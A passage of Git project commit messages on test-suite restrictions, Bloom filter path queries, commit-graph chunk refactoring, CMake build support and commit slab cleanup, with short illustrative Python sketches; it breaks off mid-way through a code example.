We could also use test_commit in all of these cases, as it runs
test_tick under the hood. But it would be awkward to do so, as these
tests diverge from the usual test_commit patterns (e.g., by creating
multiple files in a single commit).
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In previous commits, we removed the usage of test_must_fail() for most
commands except for a set of pre-approved commands. Since that's done,
only allow test_must_fail() to run those pre-approved commands.
Obviously, we should allow `git`.
We allow `__git*` as some completion functions return an error code that
comes from a git invocation. It's good to avoid using test_must_fail
unnecessarily but it wouldn't hurt to err on the side of caution when
we're potentially wrapping a git command (like in these cases).
We also allow `test-tool` and `test-svn-fe` because these are helper
commands that are written by us and we want to catch their failure.
Finally, we allow `test_terminal` because `test_terminal` just wraps
around git commands. Also, we cannot rewrite
`test_must_fail test_terminal` as `test_terminal test_must_fail` because
test_must_fail() is a shell function and as a result, it cannot be
invoked from the test-terminal Perl script.
We opted to explicitly list the above tools instead of using a catch-all
such as `test[-_]*` because we want to be as restrictive as possible so
that in the future, someone would not accidentally introduce an
unrelated usage of test_must_fail() on an "unapproved" command.
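The explicit list behaves like the following Python sketch. The real check
lives in the shell test library; this model only uses the command names
given above, and the function name is hypothetical:

```python
from fnmatch import fnmatchcase

# The pre-approved commands named above; only `__git*` is a pattern.
ALLOWED = ["git", "__git*", "test-tool", "test-svn-fe", "test_terminal"]

def is_approved(command):
    return any(fnmatchcase(command, pattern) for pattern in ALLOWED)

for command in ["git", "__gitcomp", "test-tool", "test_cmp", "cvs"]:
    print(command, is_approved(command))
```

A catch-all such as `test[-_]*` would have let `test_cmp` through, which is
the kind of accidental approval the explicit list avoids.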
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We are using `test_must_fail cvs` to test that the cvs command fails as
expected. However, test_must_fail() is used to ensure that commands fail
in an expected way, not due to something like a segv. Since we are not
in the business of verifying the sanity of the external world, replace
`test_must_fail cvs` with `! cvs` and assume that the cvs command does
not die unexpectedly.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The test_must_fail() family of functions (including test_might_fail())
should only be used on git commands. Replace test_might_fail() with
a compound command wrapping the old p4 invocation that always returns 0.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
We had a `test_must_fail verify_expect`. However, the git command in
verify_expect() was not expected to fail; the test_cmp() was the failing
command. Be more precise about testing failure by accepting an optional
first argument of '!' which causes the result of the file comparison to
be negated.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In the future, we plan on only allowing `test_might_fail` to work on a
restricted subset of commands, including `git`. Reorder the commands so
that `run_with_limited_open_files` comes before `test_might_fail`. This
way, `test_might_fail` operates on a git command.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In a future patch, we plan on making the test_must_fail()-family of
functions accept only git commands. Even though force_color() wraps an
invocation of `env git`, test_must_fail() will not be able to figure
this out since it will assume that force_color() is just some random
function which is disallowed.
Instead of using `env` in force_color() (which does not support shell
functions), export the environment variables in a subshell. Write the
invocation as `force_color test_must_fail git ...` since shell functions
are now supported.
Signed-off-by: Denton Liu <liu.denton@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The file 'dir/subdir/file' can only be modified if its leading
directories 'dir' and 'dir/subdir' are modified as well.
So when checking modified path Bloom filters looking for commits
modifying a path with multiple path components, then check not only
the full path in the Bloom filters, but all its leading directories as
well. Take care to check these paths in "deepest first" order,
because it's the full path that is least likely to be modified, and
the Bloom filter queries can short circuit sooner.
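The query order can be sketched in Python. A plain set stands in for the
Bloom filter here (so membership is a hypothetical "maybe modified"
answer), and the function names are made up for the example:

```python
def paths_to_check(path):
    """The full path first, then each leading directory, deepest first."""
    parts = path.split("/")
    return ["/".join(parts[:n]) for n in range(len(parts), 0, -1)]

def maybe_modified(path, filter_says_maybe):
    # all() stops at the first "definitely not", so the full path, which
    # is least likely to be present, gets to short-circuit the rest.
    return all(filter_says_maybe(p) for p in paths_to_check(path))

print(paths_to_check("dir/subdir/file"))

# A filter that gives a false positive for the full path but correctly
# reports that 'dir/subdir' was not touched.
false_positive = {"dir/subdir/file", "dir"}
print("dir/subdir/file" in false_positive)
print(maybe_modified("dir/subdir/file", false_positive.__contains__))
```

Checking the full path alone would have reported a possible change; the
extra query on a leading directory rules it out.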
This can significantly reduce the average false positive rate, by
about an order of magnitude or three(!), and can further speed up
pathspec-limited revision walks. The table below compares the average
false positive rate and runtime of
git rev-list HEAD -- "$path"
before and after this change for 5000+ randomly* selected paths from
each repository:
               Average false          Average            Average
               positive rate          runtime            runtime
                before     after    before     after  difference
----------------------------------------------------------------
git             3.220%   0.7853%   0.0558s   0.0387s      -30.6%
linux           2.453%   0.0296%   0.1046s   0.0766s      -26.8%
tensorflow      2.536%   0.6977%   0.0594s   0.0420s      -29.2%
*Path selection was done with the following pipeline:
git ls-tree -r --name-only HEAD | sort -R | head -n 5000
The improvements in runtime are much smaller than the improvements in
average false positive rate, as we are clearly reaching diminishing
returns here. However, all these timings depend on tree objects
being reasonably fast to access (warm caches). If we had a partial
clone and the tree objects had to be fetched from a promisor remote,
e.g.:
$ git clone --filter=tree:0 --bare file://.../webkit.git webkit.notrees.git
$ git -C webkit.git -c core.modifiedPathBloomFilters=1 \
commit-graph write --reachable
$ cp webkit.git/objects/info/commit-graph webkit.notrees.git/objects/info/
$ git -C webkit.notrees.git -c core.modifiedPathBloomFilters=1 \
rev-list HEAD -- "$path"
then checking all leading path components can reduce the runtime from
over an hour to a few seconds (and this is with the clone and the
promisor on the same machine).
This adjusts the tracing values in t4216-log-bloom.sh, which provides a
concrete way to notice the improvement.
Helped-by: Taylor Blau <me@ttaylorr.com>
Helped-by: René Scharfe <l.s.r@web.de>
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The prepare_to_use_bloom_filter() method was not intended to be called
on an empty pathspec. However, 'git log -- .' and 'git log' are subtly
different: the latter reports all commits while the former will simplify
commits that do not change the root tree.
This means that the path used to construct the bloom_key might be empty,
and that value is not added to the Bloom filter during construction.
That means that the results are likely incorrect!
To resolve the issue, be careful about the length of the path and stop
filling Bloom filters. To be completely sure we do not use them, drop
the pointer to the bloom_filter_settings from the commit-graph. That
allows our test to look at the trace2 logs to verify no Bloom filter
statistics are reported.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In my experience while experimenting with new commit-graph chunks,
early versions of the corresponding new write_commit_graph_my_chunk()
functions are, sadly but not surprisingly, often buggy, and write more
or less data than they are supposed to, especially if the chunk size
is not directly proportional to the number of commits. This then
causes all kinds of issues when reading such a bogus commit-graph
file, raising the question of whether the writing or the reading part
happens to be buggy this time.
Let's catch such issues early, already when writing the commit-graph
file, and check that each write_graph_chunk_*() function wrote the
amount of data that it was expected to, and what has been encoded in
the Chunk Lookup table. Now that all commit-graph chunks are written
in a loop we can do this check in a single place for all chunks, and
any chunks added in the future will get checked as well.
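The shape of that check can be sketched in Python. The chunk IDs, sizes
and writer functions below are placeholders, and the error is a stand-in
for however the real code reports the problem:

```python
import io

def write_chunks(out, chunks):
    """chunks: list of (chunk_id, expected_size, write_fn) entries."""
    for chunk_id, expected_size, write_fn in chunks:
        start = out.tell()
        write_fn(out)
        written = out.tell() - start
        if written != expected_size:
            raise RuntimeError(
                f"chunk {chunk_id}: expected {expected_size} bytes, "
                f"wrote {written}"
            )

good = [("AAAA", 4, lambda f: f.write(b"\0" * 4))]
buggy = [("BBBB", 8, lambda f: f.write(b"\0" * 6))]

write_chunks(io.BytesIO(), good)
try:
    write_chunks(io.BytesIO(), buggy)
except RuntimeError as err:
    print(err)
```

Because the comparison sits in the loop, a writer added later is covered
without any extra code.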
Helped-by: René Scharfe <l.s.r@web.de>
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In write_commit_graph_file() we now have one block of code filling the
array of 'struct chunk_info' with the IDs and sizes of chunks to be
written, and another block of code calling the functions responsible
for writing individual chunks. In case of optional chunks like Extra
Edge List and Base Graphs List there is also a condition checking
whether that chunk is necessary/desired, and that same condition is
repeated in both blocks of code. Other, newer chunks have similar
optional conditions.
Eliminate these repeated conditions by storing the function pointers
responsible for writing individual chunks in the 'struct chunk_info'
array as well, and calling them in a loop to write the commit-graph
file. This will open up the possibility for a bit of foolproofing in
the following patch.
Helped-by: René Scharfe <l.s.r@web.de>
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Update the write_graph_chunk_*() helper functions to have the same
signature:
- Return an int error code from all these functions.
write_graph_chunk_base() already has an int error code, now the
others will have one, too, but since they don't indicate any
error, they will always return 0.
- Drop the hash size parameter of write_graph_chunk_oids() and
write_graph_chunk_data(); its value can be read directly from
'the_hash_algo' inside these functions as well.
This opens up the possibility for further cleanups and foolproofing in
the following two patches.
Helped-by: René Scharfe <l.s.r@web.de>
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The changed-path Bloom filters were released in v2.27.0, but have a
significant drawback. A user can opt-in to writing the changed-path
filters using the "--changed-paths" option to "git commit-graph write"
but the next write will drop the filters unless that option is
specified.
This becomes even more important when considering the interaction with
gc.writeCommitGraph (on by default) or fetch.writeCommitGraph (part of
features.experimental). These config options trigger commit-graph writes
that the user did not signal, and hence there is no --changed-paths
option available.
Allow a user that opts-in to the changed-path filters to persist the
property of "my commit-graph has changed-path filters" automatically. A
user can drop filters using the --no-changed-paths option.
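The intended precedence can be written down as a tiny Python sketch. The
function and parameter names are hypothetical; the tri-state `option`
models "--changed-paths", "--no-changed-paths", or neither being given:

```python
def should_write_changed_paths(option, existing_graph_has_filters):
    """option: True, False, or None when neither flag was given."""
    if option is not None:
        return option                   # an explicit choice wins
    return existing_graph_has_filters   # otherwise keep what is there

print(should_write_changed_paths(None, True))    # persists filters
print(should_write_changed_paths(None, False))   # stays without filters
print(should_write_changed_paths(False, True))   # explicit opt-out
```

The first case is the one that matters for writes triggered by gc or
fetch, where no command-line option is available.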
In the process, we need to be extremely careful to match the Bloom
filter settings as specified by the commit-graph. This will allow future
versions of Git to customize these settings, and the version with this
change will persist those settings as commit-graphs are rewritten on
top.
Use the trace2 API to signal the settings used during the write, and
check that output in a test after manually adjusting the correct bytes
in the commit-graph file.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The get_bloom_filter() method is a bit complicated in some parts where
it does not need to be. In particular, it needs to return a NULL filter
only when compute_if_not_present is zero AND the filter data cannot be
loaded from a commit-graph file. This currently happens by accident
because the commit-graph does not load changed-path Bloom filters from
an existing commit-graph when writing a new one. This will change in a
later patch.
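The intended contract can be sketched in Python as follows. This is a simplified model rather than the C function: `get_filter`, the `graph_filters` mapping and the `compute` callback are hypothetical names used only for illustration.

```python
from typing import Callable, Dict, Optional


def get_filter(commit: str,
               graph_filters: Dict[str, bytes],
               compute_if_not_present: bool,
               compute: Callable[[str], bytes]) -> Optional[bytes]:
    """Return the filter for a commit, or None if it is unavailable.

    None is returned only when the filter cannot be loaded from the
    commit-graph data AND the caller did not ask for it to be computed.
    """
    loaded = graph_filters.get(commit)
    if loaded is not None:
        return loaded
    if not compute_if_not_present:
        return None
    return compute(commit)
```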
Also clean up some style issues while we are here.
One side-effect of returning a NULL filter is that the filters that are
reported as "too large" will now be reported as NULL instead of length
zero. This case was not properly covered before, so add a test. Further,
remove the counting of the zero-length filters from revision.c and the
trace2 logs.
Helped-by: René Scharfe <l.s.r@web.de>
Helped-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Teach .github/workflows/main.yml to use CMake for VS builds.
Modify the vs-test step to match the windows-test step. This speeds
up vs-test: calling git-cmd from PowerShell and then calling git-bash
to perform the tests slows things down (by a factor of about 6), so
git-bash is now called directly from PowerShell to run the tests using
prove.
NOTE: Since GitHub keeps the same directory for each job
(with respect to path) absolute paths are used in the bin-wrapper
scripts.
GitHub has switched to CMake 3.17.1 which changed the behaviour of
FindCURL module. An extra definition (-DCURL_NO_CURL_CMAKE=ON) has been
added to revert to the old behaviour.
In the configuration phase CMake looks for the libraries required for
building git (e.g. zlib, libiconv), so we extract the libraries before
we configure.
To check for ICONV_OMITS_BOM, libiconv.dll needs to be in the working
directory of the script or on the path, so we copy the DLLs before we
configure.
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch adds support for Visual Studio and Clang builds.
The minimum required version of CMake is upgraded to 3.15 because
this version offers proper support for Clang builds on Windows.
Libintl is not searched for when building with Visual Studio or Clang
because there is no binary compatible version available yet.
NOTE: In the link options invalidcontinue.obj has to be included.
The reason is that, by default, Windows calls abort() instead of
setting errno=EINVAL when invalid arguments are passed to standard
functions.
This commit explains it in detail:
4b623d80f7
On Windows the default generator is Visual Studio, so for Visual Studio
builds do this:
cmake `relative-path-to-srcdir`
NOTE: The Visual Studio generator is a multi-config generator, which
means that Debug and Release builds can be done in the same build
directory.
For Clang builds do this:
On bash
CC=clang cmake `relative-path-to-srcdir` -G Ninja
-DCMAKE_BUILD_TYPE=[Debug or Release]
On cmd
set CC=Clang
cmake `relative-path-to-srcdir` -G Ninja
-DCMAKE_BUILD_TYPE=[Debug or Release]
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch facilitates building git on Windows with CMake using MinGW.
NOTE: The functions unsetenv and hstrerror are not checked in Windows
builds.
Reasons:
NO_UNSETENV is not compatible with Windows builds
(see lines 262-264 of compat/mingw.h).
compat/mingw.h (line 25) provides a definition of hstrerror which
conflicts with the definition provided in
git-compat-util.h (lines 733-736).
To use CMake on Windows with MinGW do this:
cmake `relative-path-to-srcdir` -G "MinGW Makefiles"
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch allows git to be tested when performing out-of-source builds.
This involves changing GIT_BUILD_DIR in t/test-lib.sh to point to the
build directory, and copying some miscellaneous files from the source
directory to the build directory.
The copies are:
t/chainlint.sed needed by a bunch of test scripts
po/is.po needed by t0204-gettext-rencode-sanity
mergetools/tkdiff needed by t7800-difftool
contrib/completion/git-prompt.sh needed by t9903-bash-prompt
contrib/completion/git-completion.bash needed by t9902-completion
contrib/svn-fe/svnrdump_sim.py needed by t9020-remote-svn
NOTE: t/test-lib.sh is only modified when tests are run, not during
the build or configure steps.
The trash directory is still srcdir/t
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This patch provides an alternate way to test git using ctest.
CTest ships with CMake, so there is no additional dependency being
introduced.
To perform the tests with ctest do this after building:
ctest -j[number of jobs]
NOTE: -j is optional, the default number of jobs is 1
Each of the jobs does this:
cd t/ && sh t[something].sh
The reason for using CTest is that it logs the output of the tests
in a neat way, which can be helpful during diagnosis of failures.
After the tests have run ctest generates three log files located in
`build-directory`/Testing/Temporary/
These log files are:
CTestCostData.txt:
This file contains the time taken to complete each test.
LastTestsFailed.log:
This log file contains the names of the tests that have failed in the
run.
LastTest.log:
This log file contains the log of all the tests that have run.
A snippet of the file is given below.
10/901 Testing: D:/my/git-master/t/t0009-prio-queue.sh
10/901 Test: D:/my/git-master/t/t0009-prio-queue.sh
Command: "sh.exe" "D:/my/git-master/t/t0009-prio-queue.sh"
Directory: D:/my/git-master/t
"D:/my/git-master/t/t0009-prio-queue.sh"
Output:
----------------------------------------------------------
ok 1 - basic ordering
ok 2 - mixed put and get
ok 3 - notice empty queue
ok 4 - stack order
passed all 4 test(s)
1..4
<end of output>
Test time = 1.11 sec
NOTE: Testing only works when building in source for now.
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Install the built binaries and scripts using CMake
This is very similar to `make install`.
By default the destination directory (DESTDIR) is /usr/local/ on Linux.
To set a custom installation path do this:
cmake `relative-path-to-srcdir`
-DCMAKE_INSTALL_PREFIX=`preferred-install-path`
Then run `make install`
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Implement the placeholder substitution to generate scripted
Porcelain commands, e.g. git-request-pull out of
git-request-pull.sh
Generate shell/perl/python scripts and template using CMake instead of
using sed like the build procedure in the Makefile does.
The text translations are only built if `msgfmt` is found in your path.
NOTE: The scripts and templates are generated during configuration.
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In show_submodule_header(), we gather the left and right commits
of the submodule repository, as well as the merge bases. However,
prepare_submodule_summary() initializes the rev_info with the_repository,
so we end up parsing the commit in the wrong repository.
This results in a fatal error in parse_commit_in_graph(), since the
passed item does not belong to the repository's commit graph.
Signed-off-by: Michael Forney <mforney@mforney.org>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
This is needed when repo_init_revisions() is called with a repository
that is not the_repository to ensure the appropriate repository is used
in repo_parse_commit_internal(). If the wrong repository is used,
a fatal error in the commit-graph machinery occurs:
fatal: invalid commit position. commit-graph is likely corrupt
Since revision.c was the only user of the parse_commit_gently
compatibility define, remove it from commit.h.
Signed-off-by: Michael Forney <mforney@mforney.org>
Acked-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
43d3561 (commit-graph write: don't die if the existing graph is corrupt,
2019-03-25) introduced the GIT_TEST_COMMIT_GRAPH_DIE_ON_LOAD environment
variable. This was created to verify that commit-graph was not loaded
when writing a new non-incremental commit-graph.
An upcoming change wants to load a commit-graph in some valuable cases,
but we want to maintain that we don't trust the commit-graph data when
writing our new file. Instead of dying on load, die if we ever
try to parse a commit from the commit-graph. This functionally verifies
the same intended behavior, but allows a more advanced feature in the
next change.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Place an instance of struct bloom_settings into the struct
write_commit_graph_context. This allows simplifying the function
prototype of write_graph_chunk_bloom_data(). This will allow us
to combine the function prototypes and use function pointers to
simplify write_commit_graph_file().
By using a pointer, we can later replace the settings to match those
that exist in the current commit-graph, in case a future Git version
allows customization of these parameters.
Reported-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
At the moment, the recommended way to configure Git's builds is to
simply run `make`. If that does not work, the recommended strategy is to
look at the top of the `Makefile` to see whether any "Makefile knob" has
to be turned on/off, e.g. `make NO_OPENSSL=YesPlease`.
Alternatively, Git also has an `autoconf` setup which allows configuring
builds via `./configure [<option>...]`.
Both of these options are fine if the developer works on Unix or Linux.
But on Windows, we have to jump through hoops to configure a build
(read: we force the user to install a full Git for Windows SDK, which
occupies around two gigabytes (!) on disk and downloads about three
quarters of a gigabyte worth of Git objects).
The build infrastructure for Git is written around being able to run
make, which is not supported natively on Windows.
To help Windows developers, a CMake build script is introduced here.
With working CMake support, developers on Windows need only install
CMake, configure their build, load the generated Visual Studio solution
and immediately start modifying the code and building their own version
of Git. Likewise, developers on other platforms can use the convenient
GUI tools provided by CMake to configure their build.
So let's start building CMake support for Git.
This is only the first step, and to make it easier to review, it only
allows for configuring builds on the platform that is easiest to
configure for: Linux.
The CMake script checks whether the headers are present (e.g. libgen.h),
whether the functions are present (e.g. memmem), whether the functions
work properly (e.g. snprintf), and generates the required compile
definitions for the platform. The script also searches for the required
libraries; if it fails to find them, the respective executables won't
be built (e.g. if libcurl is not found then git-remote-http won't be
built). This will make building Git easier.
With a CMake script an out-of-source build of git is possible, resulting
in a clean source tree.
Note: this patch asks for the minimum version v3.14 of CMake (which is
not all that old as of time of writing) because that is the first
version to offer a platform-independent way to generate hardlinks as
part of the build. This is needed to generate all those hardlinks for
the built-in commands of Git.
Signed-off-by: Sibi Siddharthan <sibisiddharthan.github@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Unify the 'chunk_ids' and 'chunk_sizes' arrays into an array of
'struct chunk_info'. This will allow more cleanups in the following
patches.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
In write_commit_graph_file() one block of code fills the array of
chunk IDs, another block of code fills the array of chunk offsets,
then the chunk IDs and offsets are written to the Chunk Lookup table,
and finally a third block of code writes the actual chunks. In case
of optional chunks like Extra Edge List and Base Graphs List there is
also a condition checking whether that chunk is necessary/desired, and
that same condition is repeated in all those three blocks of code.
This patch series is about to add more optional chunks, so there would
be even more repeated conditions.
Those chunk offsets are relative to the beginning of the file, so they
inherently depend on the size of the Chunk Lookup table, which in turn
depends on the number of chunks that are to be written to the
commit-graph file. IOW at the time we set the first chunk's ID we
can't yet know its offset, because we don't yet know how many chunks
there are.
Simplify this by initially filling an array of chunk sizes, not
offsets, and calculate the offsets based on the chunk sizes only
later, while we are writing the Chunk Lookup table. This way we can
fill the arrays of chunk IDs and sizes in one go, eliminating one set
of repeated conditions.
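The idea can be sketched in a few lines of Python (an illustration, not the C implementation). The 8-byte header and the 12-byte lookup entries (4-byte ID plus 8-byte offset) follow the commit-graph format documentation; `build_chunk_lookup` and the example sizes are hypothetical.

```python
import struct
from typing import List, Tuple

HEADER_SIZE = 8         # bytes before the Chunk Lookup table
LOOKUP_ENTRY_SIZE = 12  # 4-byte chunk ID + 8-byte file offset


def build_chunk_lookup(chunks: List[Tuple[bytes, int]]) -> bytes:
    """Turn a list of (chunk ID, chunk size) pairs into a Chunk Lookup table.

    Offsets are derived only here, once the number of chunks (and hence
    the size of the table itself) is known.
    """
    # The first chunk starts right after the header and the lookup table,
    # which has one extra entry for the terminating label.
    offset = HEADER_SIZE + (len(chunks) + 1) * LOOKUP_ENTRY_SIZE
    table = bytearray()
    for chunk_id, size in chunks:
        table += struct.pack(">4sQ", chunk_id, offset)
        offset += size
    # Terminating label: zero ID, offset just past the last chunk.
    table += struct.pack(">4sQ", b"\0\0\0\0", offset)
    return bytes(table)


if __name__ == "__main__":
    num_extra_edges = 0
    chunks = [(b"OIDF", 256 * 4), (b"OIDL", 2 * 20)]
    if num_extra_edges:  # the condition for an optional chunk appears once
        chunks.append((b"EDGE", 4 * num_extra_edges))
    print(build_chunk_lookup(chunks).hex())
```

Filling IDs and sizes together means the condition guarding each optional chunk is written once when the list is built, not once per array.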
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The Chunk Lookup table stores the chunks' starting offset in the
commit-graph file, not their sizes. Consequently, the size of a chunk
can only be calculated by subtracting its offset from the offset of
the subsequent chunk (or that of the terminating label). This is
currently implemented in a somewhat complicated way: as we iterate over the
entries of the Chunk Lookup table, we check the id of each chunk and
store its starting offset, then we check the id of the last seen chunk
and calculate its size using its previously saved offset. At the
moment there is only one chunk for which we calculate its size, but
this patch series will add more, and the repeated chunk id checks are
not that pretty.
Instead let's read ahead the offset of the next chunk on each
iteration, so we can calculate the size of each chunk right away,
right where we store its starting offset.
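A minimal Python sketch of the read-ahead approach follows; it is an illustration under the documented 12-byte entry layout, and `parse_chunk_lookup` is a hypothetical name rather than a function in Git.

```python
import struct
from typing import Dict, Tuple

LOOKUP_ENTRY_SIZE = 12  # 4-byte chunk ID + 8-byte file offset


def parse_chunk_lookup(table: bytes, num_chunks: int) -> Dict[bytes, Tuple[int, int]]:
    """Map each chunk ID to (offset, size) in a single pass.

    On every iteration the offset of the *next* entry is read ahead, so
    the size of the current chunk is known right where its offset is
    stored. The terminating label supplies the end of the last chunk.
    """
    chunks = {}
    chunk_id, offset = struct.unpack_from(">4sQ", table, 0)
    for i in range(num_chunks):
        next_id, next_offset = struct.unpack_from(
            ">4sQ", table, (i + 1) * LOOKUP_ENTRY_SIZE)
        chunks[chunk_id] = (offset, next_offset - offset)
        chunk_id, offset = next_id, next_offset
    return chunks
```

No per-chunk "was the previous chunk the one I care about?" check is needed in this form, because every chunk gets its size the same way.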
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
While we iterate over all entries of the Chunk Lookup table we make
sure that we don't attempt to read past the end of the mmap-ed
commit-graph file, and check in each iteration that the chunk ID and
offset we are about to read is still within the mmap-ed memory region.
However, these checks in each iteration are not really necessary,
because the number of chunks in the commit-graph file is already known
before this loop from the just parsed commit-graph header.
So let's check that the commit-graph file is large enough for all
entries in the Chunk Lookup table before we start iterating over those
entries, and drop those per-iteration checks. While at it, take into
account the size of everything that is necessary to have a valid
commit-graph file, i.e. the size of the header, the size of the
mandatory OID Fanout chunk, and the size of the signature in the
trailer as well.
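As a rough sketch of such an up-front check (not the actual C code), the minimum size can be computed from the chunk count alone. The constants follow the commit-graph format documentation; the function names are hypothetical, and which terms the real check includes is an assumption based on the description above.

```python
HEADER_SIZE = 8         # signature, versions, chunk count, base graph count
LOOKUP_ENTRY_SIZE = 12  # 4-byte chunk ID + 8-byte file offset
FANOUT_SIZE = 256 * 4   # mandatory OID Fanout chunk


def min_graph_size(num_chunks: int, hash_len: int) -> int:
    """Smallest file size that can hold a valid commit-graph."""
    lookup = (num_chunks + 1) * LOOKUP_ENTRY_SIZE  # incl. terminating label
    return HEADER_SIZE + lookup + FANOUT_SIZE + hash_len  # trailer checksum


def graph_is_large_enough(file_size: int, num_chunks: int, hash_len: int) -> bool:
    """One check before the loop replaces the per-iteration bounds checks."""
    return file_size >= min_graph_size(num_chunks, hash_len)
```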
Note that this necessitates changing the error message as well, and,
consequently, updating the 'detect incorrect chunk count' test in
't5318-commit-graph.sh'.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Our CodingGuidelines says that it's sufficient to include one of
'git-compat-util.h' and 'cache.h', but both 'commit-graph.c' and
'commit-graph.h' include both. Let's include only 'git-compat-util.h'
to lose a bunch of unnecessary dependencies; but include 'hash.h',
because 'commit-graph.h' does require the definition of 'struct
object_id'.
'commit-graph.h' explicitly includes 'repository.h' and
'string-list.h', but only needs the declaration of a few structs from
them. Drop these includes and forward-declare the necessary structs
instead.
'commit-graph.c' includes 'dir.h', but doesn't actually use anything
from there, so let's drop that #include as well.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
ll_diff_tree_oid() has only ever returned 0 [1], so its return value
is basically useless. Its only caller diff_tree_oid() has only ever
returned the return value of ll_diff_tree_oid() as-is [2], so its
return value is just as useless. Most of diff_tree_oid()'s callers
simply ignore its return value, except:
- diff_root_tree_oid() is a thin wrapper around diff_tree_oid() and
returns with its return value, but all of diff_root_tree_oid()'s
callers ignore its return value.
- rev_compare_tree() and rev_same_tree_as_empty() do look at the
return value in a condition, but, since the return value is always
0, the former's < 0 condition is never fulfilled, while the
latter's >= 0 condition is always fulfilled.
So let's drop the return value of ll_diff_tree_oid(), diff_tree_oid()
and diff_root_tree_oid(), and drop those conditions from
rev_compare_tree() and rev_same_tree_as_empty() as well.
[1] ll_diff_tree_oid() and its ancestors have been returning only 0
ever since it was introduced as diff_tree() in 9174026cfe (Add
"diff-tree" program to show which files have changed between two
trees., 2005-04-09).
[2] diff_tree_oid() traces back to diff-tree.c:main() in 9174026cfe as
well.
Signed-off-by: SZEDER Gábor <szeder.dev@gmail.com>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
clear_##slabname() frees only the memory allocated for a commit slab
itself, but entries in the commit slab might own additional memory
outside the slab that should be freed as well. We already have (at
least) one such commit slab, and this patch series is about to add one
more.
To free all additional memory owned by entries on the commit slab the
user of such a slab could iterate over all commits it knows about,
peek whether there is a valid entry associated with each commit, and
free the additional memory, if any. Or it could rely on intimate
knowledge about the internals of the commit slab implementation, and
could itself iterate directly through all entries in the slab, and
free the additional memory. Or it could just leak the additional
memory...
Introduce deep_clear_##slabname() to allow releasing memory owned by
commit slab entries by invoking the 'void free_fn(elemtype *ptr)'
function specified as parameter for each entry in the slab.
Use it in get_shallow_commits() in 'shallow.c' to replace an
open-coded iteration over a commit slab's entries.
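The pattern can be modelled in Python as below. This is only an analogy: the real commit slab is a C macro-generated structure, and `CommitSlab`, `at`, `clear` and `deep_clear` here are simplified, hypothetical counterparts. Each entry is a list so that it can "own" extra data that the callback releases.

```python
from typing import Callable, List, Optional


class CommitSlab:
    """Toy slab: entries are allocated in fixed-size groups on demand."""

    def __init__(self, slab_size: int = 4) -> None:
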